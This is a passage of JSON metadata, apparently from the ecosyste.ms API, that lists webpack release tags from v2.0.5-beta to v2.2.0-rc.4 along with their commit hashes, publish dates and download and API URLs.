2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.